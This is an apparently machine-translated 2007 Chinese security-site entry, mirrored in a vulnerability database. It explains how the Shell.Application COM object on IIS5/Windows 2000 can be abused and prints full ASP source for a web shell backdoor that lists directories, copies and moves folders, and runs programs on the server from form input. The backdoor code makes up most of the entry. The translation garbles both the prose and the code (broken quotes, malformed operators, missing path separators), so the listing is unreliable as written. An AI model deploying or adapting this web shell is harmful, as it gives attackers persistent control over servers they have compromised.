Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200717438
HistoryOct 30, 2007 - 12:00 a.m.

To the shell. the application object of the vulnerability description-vulnerability warning-the black bar safety net

2007-10-3000:00:00
佚名
www.myhack58.com
10
JSON

Environment: in 2kserver+iis5 successfully, the permissions default
iis permissions: scripts executable
Description: in the 2K server on the default you can use the server. the createobject method to
Use the already installed components such as everyone knows the ADO database controls,but in addition to
These specialized components provided by outside as well as some originally provided to the system using components such as
WSH,FSO they can also use the above approach to use, of course now most of the
asp back door using them, so the existing network to delete or change the registry in both
A component’s CLSID Value to disable them, of course, also some in the"Control Panel""add delete
In addition to the program"put them directly uninstalled.
But now I use shell. the application component is already considered safe
The server component(or some people simply don’t know it), in MSDN through the shell
object can find it. This Assembly and WSH,FSO does not matter.
Through it we can do? We can browse the directory, the directory to copy
Tony, move and get file size, you can also perform existing program(bat,exe,hta)
However, you cannot add parameters.
The implementation of these we want to what are the permissions:

  1. We want to be able to upload ASP files to the scripts executable directory
  2. On the server hard disk permissions if the default of everyone full control
  3. This component has not been removed(fee)
    Below is my write examples of just calling it a shell backdoor it, I think not counting vulnerabilities is also
    To calculate a new back door.

<%response. write “<font size=6 color=red>can only execute one operation:)</font>” %>
<%response. write now()%><BR>the procedure where the physical path:
<%response. the write request. servervariables(“APPL_PHYSICAL_PATH”)%>
<html>
<title>czy’s shell. application backdoor </title>
<body>
<form action=“<%= Request. ServerVariables(“URL”) %>” method=“POST”>
<input type=text name=text value=“<%= szCMD %>”> Enter to browse the directory<br>
<input type=text name=text1 value=“<%= szCMD1 %>”>
copy
<input type=text name=text2 value=“<%= szCMD2 %>”><br>
<input type=text name=text3 value=“<%= szCMD3 %>”>
the move
<input type=text name=text4 value=“<%= szCMD4 %>”><br>
Path:<input type=text name=text5 value=“<%= szCMD5 %>”>
Program:<input type=text name=text6 value=“<%= szCMD6 %>”><br>
<input type=submit name=sb value=Send command>
</form>
</body>
</html>
<%
szCMD = Request. Form(“text”) 'directory browsing
if (szCMD <> “”) then
set shell=server. createobject(“shell. application”) 'build the shell object
set fod1=shell. namespace(szcmd)
set foditems=fod1. items
for each co in foditems
response. write “<font color=red>” & amp; co. path &“-----” & amp; co. the size & “</font><br>”
next
end if
%>

<%
szCMD1 = Request. Form(“text1”) 'directory copy, not file copy
szCMD2 = Request. Form(“text2”)
if szcmd1<>“” and szcmd2<>“” then
set shell1=server. createobject(“shell. application”) 'build the shell object
set fod1=shell1. namespace(szcmd2)

for i=len(szcmd1) to 1 step -1
if mid(szcmd1,i,1)="" then
path=left(szcmd1,i-1)
exit for
end if
next

if len(path)=2 then path=path & ""
path2=right(szcmd1,len(szcmd1)-i)
set fod2=shell1. namespace(path)
set foditem=fod2. parsename(path2)
fod1. copyhere foditem
response. write “command completed success!”
end if
%>

<%
szCMD3 = Request. Form(“text3”) 'the directory move
szCMD4 = Request. Form(“text4”)
if szcmd3<>“” and szcmd4<>“” then
set shell2=server. createobject(“shell. application”) 'build the shell object
set fod1=shell2. namespace(szcmd4)

for i=len(szcmd3) to 1 step -1
if mid(szcmd3,i,1)="" then
path=left(szcmd3,i-1)
exit for
end if
next

if len(path)=2 then path=path & “"
path2=right(szcmd3,len(szcmd3)-i)
set fod2=shell2. namespace(path)
set foditem=fod2. parsename(path2)
fod1. movehere foditem
response. write “command completed success!”
end if
%>
<%
szCMD5 = Request. Form(“text5”) 'execute the program to the specified path
szCMD6 = Request. Form(“text6”)
if szcmd5<>”" and szcmd6<>“” then
set shell3=server. createobject(“shell. application”) 'build the shell object
shell3. namespace(szcmd5). items. item(szcmd6). invokeverb
response. write “command completed success!”
end if

%>

JSON